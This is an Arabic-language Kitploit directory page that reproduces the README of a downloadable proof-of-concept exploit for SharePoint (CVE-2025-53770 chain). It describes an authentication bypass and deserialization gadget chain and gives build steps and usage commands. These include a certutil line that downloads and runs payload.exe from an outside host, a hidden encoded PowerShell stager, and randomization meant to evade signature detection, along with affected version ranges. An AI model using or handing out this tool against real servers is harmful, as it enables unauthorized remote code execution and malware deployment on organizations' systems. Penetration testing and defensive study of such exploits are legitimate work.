Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
OurSharePoint-CVE-2025-53770 — هل تعتقد حقًا أن SharePoint آمن؟ | Kitploit
أدوات/GitHubGitHub/rabbitbong/oursharepoint-cve-2025-53770
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubrabbitbong/oursharepoint-cve-2025-53770

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

OurSharePoint-CVE-2025-53770

هل تعتقد حقًا أن SharePoint آمن؟

عرض المستودع
21منذ 5 أشهرلم تتم المراجعة بعد

OurSharePoint — CVE-2025-53770 PoC

أداة RCE لـ SharePoint ذات ملف ثنائي واحد مكتفٍ ذاتيًا. تُنشئ سلسلة غادجيت TypeConfuseDelegate كبايتات خام من نوع MS-NRBF (بدون ysoserial.exe)، وتغلفها في حمولة إلغاء تسلسل DataSet، وتُوصّلها عبر HTTP باستخدام تخطي المصادقة — كل ذلك في طلقة واحدة.


سلسلة الاستغلال

الخطوةCVEالوصف
1CVE-2025-49706تخطي المصادقة — Referer: /_layouts/SignOut.aspx يتجاوز مصادقة SharePoint
2CVE-2025-53771تخطي التصحيح — مقطع مسار زائد بعد ToolPane.aspx يتجاوز إصلاح يوليو 2025
3CVE-2025-49704إلغاء التسلسل — ExcelDataSet.CompressedDataTable يُشغّل BinaryFormatter على DataSet مُصمّم
4—مخطط DataSet يُجبر LosFormatter.Deserialize() على الحمولة الداخلية عبر ExpandedWrapper + ObjectDataProvider
5—TypeConfuseDelegate — مقارن SortedSet<string> هو Process.Start(string, string)، يُنفّذ cmd /c <command>

يتم إنشاء تيار البايتات بالكامل (كل من الغلاف الخارجي DataSet والغادجيت الداخلي TypeConfuseDelegate) كسجلات MS-NRBF خام — لا يُستخدم تسلسل وقت تشغيل .NET. وهذا يتطابق مع الصيغة التي ينتجها وحدة Metasploit بايتة ببايتة.


البناء

يتطلب .NET Framework 4.8 SDK (Visual Studio 2022 أو أدوات البناء المستقلة):

root@kitploit:~
& "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" OurSharePoint.sln /p:Configuration=Release

المخرجات: OurSharePoint\bin\Release\OurSharePoint.exe (ملف واحد، بلا تبعيات)


الاستخدام

طلقة واحدة: توزيع وتنفيذ

root@kitploit:~
OurSharePoint.exe --cmd="certutil -urlcache -split -f http://10.0.0.5/payload.exe C:\Windows\Temp\p.exe & C:\Windows\Temp\p.exe" --target=https://sp.corp.com

تنفيذ أمر بسيط

root@kitploit:~
OurSharePoint.exe --cmd="whoami > C:\Windows\Temp\pwned.txt" --target=https://sp.corp.com

حوامل PowerShell

root@kitploit:~
OurSharePoint.exe --cmd="powershell -nop -w hidden -enc <base64>" --target=https://sp.corp.com

استطلاع فقط (بدون حمولة)

root@kitploit:~
OurSharePoint.exe --target=https://sp.corp.com --check

بناء ملفات الحمولة بدون اتصال

root@kitploit:~
OurSharePoint.exe --cmd="calc.exe" --out=exploit

مع وكيل (Burp)

root@kitploit:~
OurSharePoint.exe --cmd="whoami" --target=https://sp.corp.com --proxy=http://127.0.0.1:8080

تقليدي: حمولة ysoserial.exe خارجية

root@kitploit:~
ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > gadget.b64
OurSharePoint.exe --in=gadget.b64 --target=https://sp.corp.com

الخيارات


ملفات الإخراج

عند استخدام --out، تكتب الأداة:

الملفالمحتويات
<prefix>.binتيار BinaryFormatter خام لـ DataSet
<prefix>.b64مشفّر بـ GZip + Base64 (ما يُوضع في CompressedDataTable)

الإصدارات المتأثرة

الإصدارالنطاق المعرض للخطر
SharePoint Server Subscription Edition16.0.14326.20450 – 16.0.18526.20424
SharePoint Server 201916.0.10337.12109 – 16.0.10417.20027
SharePoint Enterprise Server 201616.0.4351.1000 – 16.0.5508.1000
SharePoint Server 201315.0.4481.1005 – 15.0.5545.1000

ملاحظات التنفيذ

  • لا تسلسل وقت تشغيل — يتم كتابة كل من غلاف DataSet والغادجيت الداخلي TypeConfuseDelegate كسجلات MS-NRBF ثنائية خام باستخدام BinaryWriter. وهذا يتجنب الاختلافات بين مخرجات تسلسل وقت تشغيل .NET وما يتوقعه مُلغى التسلسل الهدف.
  • تأطير LosFormatter — يتم تغليف الغادجيت الداخلي ببايتات رأس ObjectStateFormatter (0xFF 0x01 0x32 + طول 7 بت) بدلاً من استخدام LosFormatter.Serialize().
  • ملف ثنائي واحد — لا حاجة لأدوات خارجية أو DLLs أو نصوص Python. ملف .exe مكتفٍ ذاتيًا بالكامل.
  • العشوائية — يتم عشوائية بادئات علامات XML وأسماء عناصر DataSet في كل تنفيذ لتجنب اكتشاف التوقيع.

المراجع

  • Eye Security — SharePoint Under Siege
  • Metasploit PR #20409 — sharepoint_toolpane_rce
  • MS-NRBF Specification
  • pwntester/ysoserial.net — TypeConfuseDelegate
تنزيل الأداة
العلمالوصفالافتراضي
--cmd=COMMANDالأمر الذي سيتم تنفيذه (يُشغّل كـ cmd /c COMMAND)—
--in=FILEملف حمولة LosFormatter مُعدّة مسبقًا بصيغة base64—
--target=URLعنوان SharePoint الأساسي لتوصيل HTTP—
--checkبصمة الإصدار فقط، بدون حمولة—
--out=PREFIXبادئة ملف الإخراجpayload
--sp-version=VERإصدار مسار التخطيطات (15 أو 16)15
--proxy=URLوكيل HTTP—
--ua=STRINGوكيل-مستخدم مخصصFirefox 120
--referer=URLتجاوز Referer لتخطي المصادقةتلقائي
--timeout=SECمهلة HTTP15
--a/b/c=NAMEأسماء DataSet/عنصر/عمودعشوائي